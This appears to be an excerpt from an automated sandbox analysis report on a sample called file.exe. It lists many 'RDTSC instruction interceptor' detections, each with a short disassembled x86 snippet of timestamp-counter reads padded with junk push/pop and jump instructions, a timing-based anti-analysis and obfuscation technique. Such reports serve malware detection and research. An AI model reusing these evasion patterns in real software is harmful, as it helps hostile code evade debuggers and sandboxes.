              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D381 second address: B2D386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31B81 second address: B31B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31E3F second address: B31E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31E48 second address: B31E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31E4C second address: B31E88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B58h 0x00000007 jmp 00007FABF0F31B56h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FABF0F31B46h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31E88 second address: B31E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B315FD second address: B3161E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f popad 0x00000010 pushad 0x00000011 jp 00007FABF0F31B4Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B325AB second address: B325B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FABF0D685F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34142 second address: B34146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34146 second address: B34155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FABF0D685F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34155 second address: B34162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007FABF0F31B46h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34162 second address: B34168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3989D second address: B398AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC50D second address: AAC513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC513 second address: AAC517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC517 second address: AAC526 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FABF0D685F6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3861B second address: B3863F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FABF0F31B51h 0x0000000c jmp 00007FABF0F31B4Ch 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3863F second address: B3864F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D685FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3864F second address: B38658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38BB5 second address: B38BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0D685FFh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38BC9 second address: B38BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABF0F31B54h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1D30 second address: AE1D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0D68605h 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1D4A second address: AE1D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1D50 second address: AE1D6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FABF0D685F8h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B39759 second address: B3976F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0F31B52h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72A5C second address: B72A81 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FABF0D68600h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FABF0D685FFh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72A81 second address: B72A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78854 second address: B7885F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007FABF0D685F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7885F second address: B78868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78868 second address: B7886C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7886C second address: B78876 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FABF0F31B46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB839E second address: AB83A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B488 second address: B7B48D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B5DE second address: B7B5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FABF0D685F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B730 second address: B7B74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FABF0F31B54h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B74F second address: B7B755 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B755 second address: B7B75A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B75A second address: B7B78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FABF0D68608h 0x0000000e jmp 00007FABF0D68600h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E578 second address: B8E57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B99550 second address: B9956E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FABF0D685F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FABF0D685FFh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9956E second address: B99579 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B99579 second address: B995D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0D68608h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FABF0D685FFh 0x00000012 jmp 00007FABF0D685FFh 0x00000017 popad 0x00000018 jmp 00007FABF0D68606h 0x0000001d push eax 0x0000001e push edx 0x0000001f jnl 00007FABF0D685F6h 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B995D8 second address: B995DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9D141 second address: B9D16E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FABF0D685F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FABF0D68622h 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007FABF0D68606h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3193 second address: AB3197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3197 second address: AB319D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB319D second address: AB31A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB31A3 second address: AB31DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D68601h 0x00000007 push edi 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FABF0D68608h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB31DB second address: AB31E6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5C0F second address: BA5C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0D685FDh 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FABF0D68606h 0x00000011 jnp 00007FABF0D685F6h 0x00000017 jmp 00007FABF0D685FFh 0x0000001c popad 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FABF0D68605h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5C6D second address: BA5C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5C71 second address: BA5C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA46B7 second address: BA46C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0F31B4Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA46C9 second address: BA46D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FABF0D685F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA46D8 second address: BA46EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA46EF second address: BA46F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA46F3 second address: BA46F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA49D2 second address: BA49D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA49D6 second address: BA49E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FABF0F31B46h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA49E4 second address: BA49F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FABF0D685F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA4DF1 second address: BA4E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FABF0F31B54h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FABF0F31B4Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA4E1C second address: BA4E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA4E22 second address: BA4E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8DC2 second address: BA8DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0D68609h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8DDF second address: BA8E11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B56h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FABF0F31B53h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6465 second address: BB648D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FABF0D685F6h 0x0000000a jmp 00007FABF0D68609h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB648D second address: BB6497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FABF0F31B46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDBEF second address: BBDBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF545 second address: BBF555 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FABF0F31B46h 0x00000008 jno 00007FABF0F31B46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF555 second address: BBF55D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8755 second address: BB875B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB875B second address: BB875F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB875F second address: BB8796 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FABF0F31B4Eh 0x0000000c js 00007FABF0F31B6Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FABF0F31B59h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8796 second address: BB879A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC2E3 second address: BCC313 instructions: 0x00000000 rdtsc 0x00000002 je 00007FABF0F31B46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FABF0F31B61h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDFBC3 second address: BDFBE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FABF0D6862Ch 0x0000000e push ecx 0x0000000f jmp 00007FABF0D685FEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDFBE2 second address: BDFBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FABF0F31B4Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDFBF9 second address: BDFBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE48B7 second address: BE48C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jng 00007FABF0F31B59h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4088 second address: BE4098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FABF0D685F6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE41EB second address: BE4206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABF0F31B57h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4206 second address: BE420A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4492 second address: BE449E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 pop ecx 0x00000008 push edi 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE86DD second address: BE86E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE86E2 second address: BE86E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE86E8 second address: BE86EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE86EC second address: BE86F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE86F0 second address: BE8702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FABF0D685F6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE89EC second address: BE8A4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jns 00007FABF0F31B47h 0x00000012 stc 0x00000013 movsx edx, bx 0x00000016 push 00000004h 0x00000018 push ecx 0x00000019 mov dl, A0h 0x0000001b pop edx 0x0000001c call 00007FABF0F31B49h 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007FABF0F31B53h 0x0000002a popad 0x0000002b pop eax 0x0000002c push eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FABF0F31B4Eh 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE8A4F second address: BE8A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE8C32 second address: BE8C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push esi 0x00000007 je 00007FABF0F31B55h 0x0000000d pop esi 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D2E99h], ebx 0x00000015 push dword ptr [ebp+122D3557h] 0x0000001b mov edx, edi 0x0000001d push 881EA78Dh 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 jg 00007FABF0F31B46h 0x0000002b pop ebx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA521 second address: BEA525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA0F3 second address: BEA0F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA0F9 second address: BEA0FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA0FF second address: BEA105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA105 second address: BEA109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA109 second address: BEA10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F802B5 second address: 4F802B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F802B9 second address: 4F802D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8036A second address: 4F80370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
